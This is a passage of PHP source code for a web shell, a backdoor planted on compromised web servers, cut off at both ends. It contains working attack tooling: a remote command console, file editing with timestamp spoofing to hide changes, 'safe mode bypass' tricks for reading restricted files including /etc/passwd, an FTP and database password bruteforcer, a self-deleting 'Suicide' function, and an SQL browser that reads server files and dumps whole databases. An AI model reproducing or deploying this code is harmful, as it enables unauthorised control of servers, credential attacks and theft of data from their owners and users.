!@feof(\$fp) )\r\n\t\t\t\t\techo htmlspecialchars(@fread(\$fp, 1024));\r\n\t\t\t\t@fclose(\$fp);\r\n\t\t\t}\r\n\t\t\techo '</pre>';\r\n\t\t\tbreak;\r\n\t\tcase 'highlight':\r\n\t\t\tif( @is_readable(\$_POST['p1']) ) {\r\n\t\t\t\techo '<div class=ml1 style=\"background-color: #e1e1e1;color:black;\">';\r\n\t\t\t\t\$code = @highlight_file(\$_POST['p1'],true);\r\n\t\t\t\techo str_replace(array('<span ','</span>'), array('<font ','</font>'),\$code).'</div>';\r\n\t\t\t}\r\n\t\t\tbreak;\r\n\t\tcase 'chmod':\r\n\t\t\tif( !empty(\$_POST['p3']) ) {\r\n\t\t\t\t\$perms = 0;\r\n\t\t\t\tfor(\$i=strlen(\$_POST['p3'])-1;\$i>=0;--\$i)\r\n\t\t\t\t\t\$perms += (int)\$_POST['p3'][\$i]*pow(8, (strlen(\$_POST['p3'])-\$i-1));\r\n\t\t\t\tif(!@chmod(\$_POST['p1'], \$perms))\r\n\t\t\t\t\techo 'Can\\'t set permissions!<br><script>document.mf.p3.value=\"\";</script>';\r\n\t\t\t}\r\n\t\t\tclearstatcache();\r\n\t\t\techo '<script>p3_=\"\";</script><form onsubmit=\"g(null,null,null,null,this.chmod.value);return false;\"><input type=text name=chmod value=\"'.substr(sprintf('%o', fileperms(\$_POST['p1'])),-4).'\"><input type=submit value=\">>\"></form>';\r\n\t\t\tbreak;\r\n\t\tcase 'edit':\r\n\t\t\tif( !is_writable(\$_POST['p1'])) {\r\n\t\t\t\techo 'File isn\\'t writeable';\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\tif( !empty(\$_POST['p3']) ) {\r\n\t\t\t\t\$time = @filemtime(\$_POST['p1']);\r\n\t\t\t\t\$_POST['p3'] = substr(\$_POST['p3'],1);\r\n\t\t\t\t\$fp = @fopen(\$_POST['p1'],\"w\");\r\n\t\t\t\tif(\$fp) {\r\n\t\t\t\t\t@fwrite(\$fp,\$_POST['p3']);\r\n\t\t\t\t\t@fclose(\$fp);\r\n\t\t\t\t\techo 'Saved!<br><script>p3_=\"\";</script>';\r\n\t\t\t\t\t@touch(\$_POST['p1'],\$time,\$time);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\techo '<form onsubmit=\"g(null,null,null,null,\\'1\\'+this.text.value);return false;\"><textarea name=text class=bigarea>';\r\n\t\t\t\$fp = @fopen(\$_POST['p1'], 'r');\r\n\t\t\tif(\$fp) {\r\n\t\t\t\twhile( !@feof(\$fp) )\r\n\t\t\t\t\techo htmlspecialchars(@fread(\$fp, 1024));\r\n\t\t\t\t@fclose(\$fp);\r\n\t\t\t}\r\n\t\t\techo '</textarea><input type=submit value=\">>\"></form>';\r\n\t\t\tbreak;\r\n\t\tcase 'hexdump':\r\n\t\t\t\$c = @file_get_contents(\$_POST['p1']);\r\n\t\t\t\$n = 0;\r\n\t\t\t\$h = array('00000000<br>','','');\r\n\t\t\t\$len = strlen(\$c);\r\n\t\t\tfor (\$i=0; \$i<\$len; ++\$i) {\r\n\t\t\t\t\$h[1] .= sprintf('%02X',ord(\$c[\$i])).' ';\r\n\t\t\t\tswitch ( ord(\$c[\$i]) ) {\r\n\t\t\t\t\tcase 0: \$h[2] .= ' '; break;\r\n\t\t\t\t\tcase 9: \$h[2] .= ' '; break;\r\n\t\t\t\t\tcase 10: \$h[2] .= ' '; break;\r\n\t\t\t\t\tcase 13: \$h[2] .= ' '; break;\r\n\t\t\t\t\tdefault: \$h[2] .= \$c[\$i]; break;\r\n\t\t\t\t}\r\n\t\t\t\t\$n++;\r\n\t\t\t\tif (\$n == 32) {\r\n\t\t\t\t\t\$n = 0;\r\n\t\t\t\t\tif (\$i+1 < \$len) {\$h[0] .= sprintf('%08X',\$i+1).'<br>';}\r\n\t\t\t\t\t\$h[1] .= '<br>';\r\n\t\t\t\t\t\$h[2] .= \"\\n\";\r\n\t\t\t\t}\r\n\t\t \t}\r\n\t\t\techo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style=\"font-weight: normal;\"><pre>'.\$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.\$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars(\$h[2]).'</pre></td></tr></table>';\r\n\t\t\tbreak;\r\n\t\tcase 'rename':\r\n\t\t\tif( !empty(\$_POST['p3']) ) {\r\n\t\t\t\tif(!@rename(\$_POST['p1'], \$_POST['p3']))\r\n\t\t\t\t\techo 'Can\\'t rename!<br>';\r\n\t\t\t\telse\r\n\t\t\t\t\tdie('<script>g(null,null,\"'.urlencode(\$_POST['p3']).'\",null,\"\")</script>');\r\n\t\t\t}\r\n\t\t\techo '<form onsubmit=\"g(null,null,null,null,this.name.value);return false;\"><input type=text name=name value=\"'.htmlspecialchars(\$_POST['p1']).'\"><input type=submit value=\">>\"></form>';\r\n\t\t\tbreak;\r\n\t\tcase 'touch':\r\n\t\t\tif( !empty(\$_POST['p3']) ) {\r\n\t\t\t\t\$time = strtotime(\$_POST['p3']);\r\n\t\t\t\tif(\$time) {\r\n\t\t\t\t\tif(!touch(\$_POST['p1'],\$time,\$time))\r\n\t\t\t\t\t\techo 'Fail!';\r\n\t\t\t\t\telse\r\n\t\t\t\t\t\techo 'Touched!';\r\n\t\t\t\t} else echo 'Bad time format!';\r\n\t\t\t}\r\n\t\t\tclearstatcache();\r\n\t\t\techo '<script>p3_=\"\";</script><form onsubmit=\"g(null,null,null,null,this.touch.value);return false;\"><input type=text name=touch value=\"'.date(\"Y-m-d H:i:s\", @filemtime(\$_POST['p1'])).'\"><input type=submit value=\">>\"></form>';\r\n\t\t\tbreak;\r\n\t}\r\n\techo '</div>';\r\n\tBOFFFooter();\r\n}\r\n\r\nfunction actionSafeMode() {\r\n\t\$temp='';\r\n\tob_start();\r\n\tswitch(\$_POST['p1']) {\r\n\t\tcase 1:\r\n\t\t\t\$temp=@tempnam(\$test, 'cx');\r\n\t\t\tif(@copy(\"compress.zlib://\".\$_POST['p2'], \$temp)){\r\n\t\t\t\techo @file_get_contents(\$temp);\r\n\t\t\t\tunlink(\$temp);\r\n\t\t\t} else\r\n\t\t\t\techo 'Sorry... Can\\'t open file';\r\n\t\t\tbreak;\r\n\t\tcase 2:\r\n\t\t\t\$files = glob(\$_POST['p2'].'*');\r\n\t\t\tif( is_array(\$files) )\r\n\t\t\t\tforeach (\$files as \$filename)\r\n\t\t\t\t\techo \$filename.\"\\n\";\r\n\t\t\tbreak;\r\n\t\tcase 3:\r\n\t\t\t\$ch = curl_init(\"file://\".\$_POST['p2'].\"\\x00\".preg_replace('!\\(\\d+\\)\\s.*!', '', __FILE__));\r\n\t\t\tcurl_exec(\$ch);\r\n\t\t\tbreak;\r\n\t\tcase 4:\r\n\t\t\tini_restore(\"safe_mode\");\r\n\t\t\tini_restore(\"open_basedir\");\r\n\t\t\tinclude(\$_POST['p2']);\r\n\t\t\tbreak;\r\n\t\tcase 5:\r\n\t\t\tfor(;\$_POST['p2'] <= \$_POST['p3'];\$_POST['p2']++) {\r\n\t\t\t\t\$uid = @posix_getpwuid(\$_POST['p2']);\r\n\t\t\t\tif (\$uid)\r\n\t\t\t\t\techo join(':',\$uid).\"\\n\";\r\n\t\t\t}\r\n\t\t\tbreak;\r\n\t}\r\n\t\$temp = ob_get_clean();\r\n\tBOFFHeader();\r\n\techo '<h1>Safe mode bypass</h1><div class=content>';\r\n\techo '<span>Copy (read file)</span><form onsubmit=\\'g(null,null,\"1\",this.param.value);return false;\\'><input type=text name=param><input type=submit value=\">>\"></form><br><span>Glob (list dir)</span><form onsubmit=\\'g(null,null,\"2\",this.param.value);return false;\\'><input type=text name=param><input type=submit value=\">>\"></form><br><span>Curl (read file)</span><form onsubmit=\\'g(null,null,\"3\",this.param.value);return false;\\'><input type=text name=param><input type=submit value=\">>\"></form><br><span>Ini_restore (read file)</span><form onsubmit=\\'g(null,null,\"4\",this.param.value);return false;\\'><input type=text name=param><input type=submit value=\">>\"></form><br><span>Posix_getpwuid (\"Read\" /etc/passwd)</span><table><form onsubmit=\\'g(null,null,\"5\",this.param1.value,this.param2.value);return false;\\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=\">>\"></form>';\r\n\tif(\$temp)\r\n\t\techo '<pre class=\"ml1\" style=\"margin-top:5px\" id=\"Output\">'.htmlspecialchars(\$temp).'</pre>';\r\n\techo '</div>';\r\n\tBOFFFooter();\r\n}\r\n\r\nfunction actionConsole() {\r\n if(!empty(\$_POST['p1']) && !empty(\$_POST['p2'])) {\r\n \$_SESSION[md5(\$_SERVER['HTTP_HOST']).'stderr_to_out'] = true;\r\n \$_POST['p1'] .= ' 2>&1';\r\n } elseif(!empty(\$_POST['p1']))\r\n \$_SESSION[md5(\$_SERVER['HTTP_HOST']).'stderr_to_out'] = false;\r\n\r\n\tif(isset(\$_POST['ajax'])) {\r\n\t\t\$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax'] = true;\r\n\t\tob_start();\r\n\t\techo \"d.cf.cmd.value='';\\n\";\r\n\t\t\$temp = @iconv(\$_POST['charset'], 'UTF-8', addcslashes(\"\\n\$ \".\$_POST['p1'].\"\\n\".BOFFEx(\$_POST['p1']),\"\\n\\r\\t\\\\'\\0\"));\r\n\t\tif(preg_match(\"!.*cd\\s+([^;]+)\$!\",\$_POST['p1'],\$match))\t{\r\n\t\t\tif(@chdir(\$match[1])) {\r\n\t\t\t\t\$GLOBALS['cwd'] = @getcwd();\r\n\t\t\t\techo \"c_='\".\$GLOBALS['cwd'].\"';\";\r\n\t\t\t}\r\n\t\t}\r\n\t\techo \"d.cf.output.value+='\".\$temp.\"';\";\r\n\t\techo \"d.cf.output.scrollTop = d.cf.output.scrollHeight;\";\r\n\t\t\$temp = ob_get_clean();\r\n\t\techo strlen(\$temp), \"\\n\", \$temp;\r\n\t\texit;\r\n\t}\r\n\tBOFFHeader();\r\n echo \"<script>\r\nif(window.Event) window.captureEvents(Event.KEYDOWN);\r\nvar cmds = new Array('');\r\nvar cur = 0;\r\nfunction kp(e) {\r\n\tvar n = (window.Event) ? e.which : e.keyCode;\r\n\tif(n == 38) {\r\n\t\tcur--;\r\n\t\tif(cur>=0)\r\n\t\t\tdocument.cf.cmd.value = cmds[cur];\r\n\t\telse\r\n\t\t\tcur++;\r\n\t} else if(n == 40) {\r\n\t\tcur++;\r\n\t\tif(cur < cmds.length)\r\n\t\t\tdocument.cf.cmd.value = cmds[cur];\r\n\t\telse\r\n\t\t\tcur--;\r\n\t}\r\n}\r\nfunction add(cmd) {\r\n\tcmds.pop();\r\n\tcmds.push(cmd);\r\n\tcmds.push('');\r\n\tcur = cmds.length-1;\r\n}\r\n</script>\";\r\n\techo '<h1>Console</h1><div class=content><form name=cf onsubmit=\"if(d.cf.cmd.value==\\'clear\\'){d.cf.output.value=\\'\\';d.cf.cmd.value=\\'\\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\\'\\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\\'\\');} return false;\"><select name=alias>';\r\n\tforeach(\$GLOBALS['aliases'] as \$n => \$v) {\r\n\t\tif(\$v == '') {\r\n\t\t\techo '<optgroup label=\"-'.htmlspecialchars(\$n).'-\"></optgroup>';\r\n\t\t\tcontinue;\r\n\t\t}\r\n\t\techo '<option value=\"'.htmlspecialchars(\$v).'\">'.\$n.'</option>';\r\n\t}\r\n\tif(empty(\$_POST['ajax'])&&!empty(\$_POST['p1']))\r\n\t\t\$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax'] = false;\r\n\techo '</select><input type=button onclick=\"add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\\'\\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\\'\\');}\" value=\">>\"> <nobr><input type=checkbox name=ajax value=1 '.(@\$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty(\$_POST['p2'])||\$_SESSION[md5(\$_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style=\"border-bottom:0;margin:0;\" readonly>';\r\n\tif(!empty(\$_POST['p1'])) {\r\n\t\techo htmlspecialchars(\"\$ \".\$_POST['p1'].\"\\n\".BOFFEx(\$_POST['p1']));\r\n\t}\r\n\techo '</textarea><table style=\"border:1px solid #df5;background-color:#555;border-top:0px;\" cellpadding=0 cellspacing=0 width=\"100%\"><tr><td width=\"1%\">\$</td><td><input type=text name=cmd style=\"border:0px;width:100%;\" onkeydown=\"kp(event);\"></td></tr></table>';\r\n\techo '</form></div><script>d.cf.cmd.focus();</script>';\r\n\tBOFFFooter();\r\n}\r\n\r\nfunction actionLogout() {\r\n session_destroy();\r\n\tdie('bye!');\r\n}\r\n\r\nfunction actionSelfRemove() {\r\n\t\r\n\tif(\$_POST['p1'] == 'yes')\r\n\t\tif(@unlink(preg_replace('!\\(\\d+\\)\\s.*!', '', __FILE__)))\r\n\t\t\tdie('Shell has been removed');\r\n\t\telse\r\n\t\t\techo 'unlink error!';\r\n if(\$_POST['p1'] != 'yes')\r\n BOFFHeader();\r\n\techo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick=\"g(null,null,\\'yes\\')\">Yes</a></div>';\r\n\tBOFFFooter();\r\n}\r\n\r\nfunction actionBruteforce() {\r\n\tBOFFHeader();\r\n\tif( isset(\$_POST['proto']) ) {\r\n\t\techo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars(\$_POST['proto']).' <span>Server:</span> '.htmlspecialchars(\$_POST['server']).'<br>';\r\n\t\tif( \$_POST['proto'] == 'ftp' ) {\r\n\t\t\tfunction bruteForce(\$ip,\$port,\$login,\$pass) {\r\n\t\t\t\t\$fp = @ftp_connect(\$ip, \$port?\$port:21);\r\n\t\t\t\tif(!\$fp) return false;\r\n\t\t\t\t\$res = @ftp_login(\$fp, \$login, \$pass);\r\n\t\t\t\t@ftp_close(\$fp);\r\n\t\t\t\treturn \$res;\r\n\t\t\t}\r\n\t\t} elseif( \$_POST['proto'] == 'mysql' ) {\r\n\t\t\tfunction bruteForce(\$ip,\$port,\$login,\$pass) {\r\n\t\t\t\t\$res = @mysql_connect(\$ip.':'.\$port?\$port:3306, \$login, \$pass);\r\n\t\t\t\t@mysql_close(\$res);\r\n\t\t\t\treturn \$res;\r\n\t\t\t}\r\n\t\t} elseif( \$_POST['proto'] == 'pgsql' ) {\r\n\t\t\tfunction bruteForce(\$ip,\$port,\$login,\$pass) {\r\n\t\t\t\t\$str = \"host='\".\$ip.\"' port='\".\$port.\"' user='\".\$login.\"' password='\".\$pass.\"' dbname=postgres\";\r\n\t\t\t\t\$res = @pg_connect(\$str);\r\n\t\t\t\t@pg_close(\$res);\r\n\t\t\t\treturn \$res;\r\n\t\t\t}\r\n\t\t}\r\n\t\t\$success = 0;\r\n\t\t\$attempts = 0;\r\n\t\t\$server = explode(\":\", \$_POST['server']);\r\n\t\tif(\$_POST['type'] == 1) {\r\n\t\t\t\$temp = @file('/etc/passwd');\r\n\t\t\tif( is_array(\$temp) )\r\n\t\t\t\tforeach(\$temp as \$line) {\r\n\t\t\t\t\t\$line = explode(\":\", \$line);\r\n\t\t\t\t\t++\$attempts;\r\n\t\t\t\t\tif( bruteForce(@\$server[0],@\$server[1], \$line[0], \$line[0]) ) {\r\n\t\t\t\t\t\t\$success++;\r\n\t\t\t\t\t\techo '<b>'.htmlspecialchars(\$line[0]).'</b>:'.htmlspecialchars(\$line[0]).'<br>';\r\n\t\t\t\t\t}\r\n\t\t\t\t\tif(@\$_POST['reverse']) {\r\n\t\t\t\t\t\t\$tmp = \"\";\r\n\t\t\t\t\t\tfor(\$i=strlen(\$line[0])-1; \$i>=0; --\$i)\r\n\t\t\t\t\t\t\t\$tmp .= \$line[0][\$i];\r\n\t\t\t\t\t\t++\$attempts;\r\n\t\t\t\t\t\tif( bruteForce(@\$server[0],@\$server[1], \$line[0], \$tmp) ) {\r\n\t\t\t\t\t\t\t\$success++;\r\n\t\t\t\t\t\t\techo '<b>'.htmlspecialchars(\$line[0]).'</b>:'.htmlspecialchars(\$tmp);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t} elseif(\$_POST['type'] == 2) {\r\n\t\t\t\$temp = @file(\$_POST['dict']);\r\n\t\t\tif( is_array(\$temp) )\r\n\t\t\t\tforeach(\$temp as \$line) {\r\n\t\t\t\t\t\$line = trim(\$line);\r\n\t\t\t\t\t++\$attempts;\r\n\t\t\t\t\tif( bruteForce(\$server[0],@\$server[1], \$_POST['login'], \$line) ) {\r\n\t\t\t\t\t\t\$success++;\r\n\t\t\t\t\t\techo '<b>'.htmlspecialchars(\$_POST['login']).'</b>:'.htmlspecialchars(\$line).'<br>';\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t}\r\n\t\techo \"<span>Attempts:</span> \$attempts <span>Success:</span> \$success</div><br>\";\r\n\t}\r\n\techo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'\r\n\t\t.'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'\r\n\t\t.'<input type=hidden name=c value=\"'.htmlspecialchars(\$GLOBALS['cwd']).'\">'\r\n\t\t.'<input type=hidden name=a value=\"'.htmlspecialchars(\$_POST['a']).'\">'\r\n\t\t.'<input type=hidden name=charset value=\"'.htmlspecialchars(\$_POST['charset']).'\">'\r\n\t\t.'<span>Server:port</span></td>'\r\n\t\t.'<td><input type=text name=server value=\"127.0.0.1\"></td></tr>'\r\n\t\t.'<tr><td><span>Brute type</span></td>'\r\n\t\t.'<td><label><input type=radio name=type value=\"1\" checked> /etc/passwd</label></td></tr>'\r\n\t\t.'<tr><td></td><td><label style=\"padding-left:15px\"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'\r\n\t\t.'<tr><td></td><td><label><input type=radio name=type value=\"2\"> Dictionary</label></td></tr>'\r\n\t\t.'<tr><td></td><td><table style=\"padding-left:15px\"><tr><td><span>Login</span></td>'\r\n\t\t.'<td><input type=text name=login value=\"root\"></td></tr>'\r\n\t\t.'<tr><td><span>Dictionary</span></td>'\r\n\t\t.'<td><input type=text name=dict value=\"'.htmlspecialchars(\$GLOBALS['cwd']).'passwd.dic\"></td></tr></table>'\r\n\t\t.'</td></tr><tr><td></td><td><input type=submit value=\">>\"></td></tr></form></table>';\r\n\techo '</div><br>';\r\n\tBOFFFooter();\r\n}\r\n\r\nfunction actionSql() {\r\n\tclass DbClass {\r\n\t\tvar \$type;\r\n\t\tvar \$link;\r\n\t\tvar \$res;\r\n\t\tfunction DbClass(\$type)\t{\r\n\t\t\t\$this->type = \$type;\r\n\t\t}\r\n\t\tfunction connect(\$host, \$user, \$pass, \$dbname){\r\n\t\t\tswitch(\$this->type)\t{\r\n\t\t\t\tcase 'mysql':\r\n\t\t\t\t\tif( \$this->link = @mysql_connect(\$host,\$user,\$pass,true) ) return true;\r\n\t\t\t\t\tbreak;\r\n\t\t\t\tcase 'pgsql':\r\n\t\t\t\t\t\$host = explode(':', \$host);\r\n\t\t\t\t\tif(!\$host[1]) \$host[1]=5432;\r\n\t\t\t\t\tif( \$this->link = @pg_connect(\"host={\$host[0]} port={\$host[1]} user=\$user password=\$pass dbname=\$dbname\") ) return true;\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction selectdb(\$db) {\r\n\t\t\tswitch(\$this->type)\t{\r\n\t\t\t\tcase 'mysql':\r\n\t\t\t\t\tif (@mysql_select_db(\$db))return true;\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction query(\$str) {\r\n\t\t\tswitch(\$this->type) {\r\n\t\t\t\tcase 'mysql':\r\n\t\t\t\t\treturn \$this->res = @mysql_query(\$str);\r\n\t\t\t\t\tbreak;\r\n\t\t\t\tcase 'pgsql':\r\n\t\t\t\t\treturn \$this->res = @pg_query(\$this->link,\$str);\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction fetch() {\r\n\t\t\t\$res = func_num_args()?func_get_arg(0):\$this->res;\r\n\t\t\tswitch(\$this->type)\t{\r\n\t\t\t\tcase 'mysql':\r\n\t\t\t\t\treturn @mysql_fetch_assoc(\$res);\r\n\t\t\t\t\tbreak;\r\n\t\t\t\tcase 'pgsql':\r\n\t\t\t\t\treturn @pg_fetch_assoc(\$res);\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction listDbs() {\r\n\t\t\tswitch(\$this->type)\t{\r\n\t\t\t\tcase 'mysql':\r\n return \$this->query(\"SHOW databases\");\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase 'pgsql':\r\n\t\t\t\t\treturn \$this->res = \$this->query(\"SELECT datname FROM pg_database WHERE datistemplate!='t'\");\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction listTables() {\r\n\t\t\tswitch(\$this->type)\t{\r\n\t\t\t\tcase 'mysql':\r\n\t\t\t\t\treturn \$this->res = \$this->query('SHOW TABLES');\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase 'pgsql':\r\n\t\t\t\t\treturn \$this->res = \$this->query(\"select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'\");\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction error() {\r\n\t\t\tswitch(\$this->type)\t{\r\n\t\t\t\tcase 'mysql':\r\n\t\t\t\t\treturn @mysql_error();\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase 'pgsql':\r\n\t\t\t\t\treturn @pg_last_error();\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction setCharset(\$str) {\r\n\t\t\tswitch(\$this->type)\t{\r\n\t\t\t\tcase 'mysql':\r\n\t\t\t\t\tif(function_exists('mysql_set_charset'))\r\n\t\t\t\t\t\treturn @mysql_set_charset(\$str, \$this->link);\r\n\t\t\t\t\telse\r\n\t\t\t\t\t\t\$this->query('SET CHARSET '.\$str);\r\n\t\t\t\t\tbreak;\r\n\t\t\t\tcase 'pgsql':\r\n\t\t\t\t\treturn @pg_set_client_encoding(\$this->link, \$str);\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction loadFile(\$str) {\r\n\t\t\tswitch(\$this->type)\t{\r\n\t\t\t\tcase 'mysql':\r\n\t\t\t\t\treturn \$this->fetch(\$this->query(\"SELECT LOAD_FILE('\".addslashes(\$str).\"') as file\"));\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase 'pgsql':\r\n\t\t\t\t\t\$this->query(\"CREATE TABLE BOFF2(file text);COPY BOFF2 FROM '\".addslashes(\$str).\"';select file from BOFF2;\");\r\n\t\t\t\t\t\$r=array();\r\n\t\t\t\t\twhile(\$i=\$this->fetch())\r\n\t\t\t\t\t\t\$r[] = \$i['file'];\r\n\t\t\t\t\t\$this->query('drop table BOFF2');\r\n\t\t\t\t\treturn array('file'=>implode(\"\\n\",\$r));\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction dump(\$table, \$fp = false) {\r\n\t\t\tswitch(\$this->type)\t{\r\n\t\t\t\tcase 'mysql':\r\n\t\t\t\t\t\$res = \$this->query('SHOW CREATE TABLE `'.\$table.'`');\r\n\t\t\t\t\t\$create = mysql_fetch_array(\$res);\r\n\t\t\t\t\t\$sql = \$create[1].\";\\n\";\r\n if(\$fp) fwrite(\$fp, \$sql); else echo(\$sql);\r\n\t\t\t\t\t\$this->query('SELECT * FROM `'.\$table.'`');\r\n \$head = true;\r\n\t\t\t\t\twhile(\$item = \$this->fetch()) {\r\n\t\t\t\t\t\t\$columns = array();\r\n\t\t\t\t\t\tforeach(\$item as \$k=>\$v) {\r\n if(\$v == null)\r\n \$item[\$k] = \"NULL\";\r\n elseif(is_numeric(\$v))\r\n \$item[\$k] = \$v;\r\n else\r\n \$item[\$k] = \"'\".@mysql_real_escape_string(\$v).\"'\";\r\n\t\t\t\t\t\t\t\$columns[] = \"`\".\$k.\"`\";\r\n\t\t\t\t\t\t}\r\n if(\$head) {\r\n \$sql = 'INSERT INTO `'.\$table.'` ('.implode(\", \", \$columns).\") VALUES \\n\\t(\".implode(\", \", \$item).')';\r\n \$head = false;\r\n } else\r\n \$sql = \"\\n\\t,(\".implode(\", \", \$item).')';\r\n if(\$fp) fwrite(\$fp, \$sql); else echo(\$sql);\r\n\t\t\t\t\t}\r\n if(!\$head)\r\n if(\$fp) fwrite(\$fp, \";\\n\\n\"); else echo(\";\\n\\n\");\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase 'pgsql':\r\n\t\t\t\t\t\$this->query('SELECT * FROM '.\$table);\r\n\t\t\t\t\twhile(\$item = \$this->fetch()) {\r\n\t\t\t\t\t\t\$columns = array();\r\n\t\t\t\t\t\tforeach(\$item as \$k=>\$v) {\r\n\t\t\t\t\t\t\t\$item[\$k] = \"'\".addslashes(\$v).\"'\";\r\n\t\t\t\t\t\t\t\$columns[] = \$k;\r\n\t\t\t\t\t\t}\r\n \$sql = 'INSERT INTO '.\$table.' ('.implode(\", \", \$columns).') VALUES ('.implode(\", \", \$item).');'.\"\\n\";\r\n if(\$fp) fwrite(\$fp, \$sql); else echo(\$sql);\r\n\t\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t};\r\n\t\$db = new DbClass(\$_POST['type']);\r\n\tif(@\$_POST['p2']=='download') {\r\n\t\t\$db->connect(\$_POST['sql_host'], \$_POST['sql_login'], \$_POST['sql_pass'], \$_POST['sql_base']);\r\n\t\t\$db->selectdb(\$_POST['sql_base']);\r\n switch(\$_POST['charset']) {\r\n case \"Windows-1251\": \$db->setCharset('cp1251'); break;\r\n case \"UTF-8\": \$db->setCharset('utf8'); break;\r\n case \"KOI8-R\": \$db->setCharset('koi8r'); break;\r\n case \"KOI8-U\": \$db->setCharset('koi8u'); break;\r\n case \"cp866\": \$db->setCharset('cp866'); break;\r\n }\r\n if(empty(\$_POST['file'])) {\r\n ob_start(\"ob_gzhandler\", 4096);\r\n header(\"Content-Disposition: attachment; filename=dump.sql\");\r\n header(\"Content-Type: text/plain\");\r\n foreach(\$_POST['tbl'] as \$v)\r\n\t\t\t\t\$db->dump(\$v);\r\n exit;\r\n } elseif(\$fp = @fopen(\$_POST['file'], 'w')) {\r\n foreach(\$_POST['tbl'] as \$v)\r\n \$db->dump(\$v, \$fp);\r\n fclose(\$fp);\r\n unset(\$_POST['p2']);\r\n } else\r\n die('<script>alert(\"Error! Can\\'t open file\");window.history.back(-1)</script>');\r\n\t}\r\n\tBOFFHeader();\r\n\techo \"\r\n<h1>Sql browser</h1><div class=content>\r\n<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>\r\n<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>\r\n<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='\". htmlspecialchars(\$GLOBALS['cwd']) .\"'><input type=hidden name=charset value='\". (isset(\$_POST['charset'])?\$_POST['charset']:'') .\"'>\r\n<td><select name='type'><option value='mysql' \";\r\n if(@\$_POST['type']=='mysql')echo 'selected';\r\necho \">MySql</option><option value='pgsql' \";\r\nif(@\$_POST['type']=='pgsql')echo 'selected';\r\necho \">PostgreSql</option></select></td>\r\n<td><input type=text name=sql_host value='\". (empty(\$_POST['sql_host'])?'localhost':htmlspecialchars(\$_POST['sql_host'])) .\"'></td>\r\n<td><input type=text name=sql_login value='\". (empty(\$_POST['sql_login'])?'root':htmlspecialchars(\$_POST['sql_login'])) .\"'></td>\r\n<td><input type=text name=sql_pass value='\". (empty(\$_POST['sql_pass'])?'':htmlspecialchars(\$_POST['sql_pass'])) .\"'></td><td>\";\r\n\t\$tmp = \"<input type=text name=sql_base value=''>\";\r\n\tif(isset(\$_POST['sql_host'])){\r\n\t\tif(\$db->connect(\$_POST['sql_host'], \$_POST['sql_login'], \$_POST['sql_pass'], \$_POST['sql_base'])) {\r\n\t\t\tswitch(\$_POST['charset']) {\r\n\t\t\t\tcase \"Windows-1251\": \$db->setCharset('cp1251'); break;\r\n\t\t\t\tcase \"UTF-8\": \$db->setCharset('utf8'); break;\r\n\t\t\t\tcase \"KOI8-R\": \$db->setCharset('koi8r'); break;\r\n\t\t\t\tcase \"KOI8-U\": \$db->setCharset('koi8u'); break;\r\n\t\t\t\tcase \"cp866\": \$db->setCharset('cp866'); break;\r\n\t\t\t}\r\n\t\t\t\$db->listDbs();\r\n\t\t\techo \"<select name=sql_base><option value=''></option>\";\r\n\t\t\twhile(\$item = \$db->fetch()) {\r\n\t\t\t\tlist(\$key, \$value) = each(\$item);\r\n\t\t\t\techo '<option value=\"'.\$value.'\" 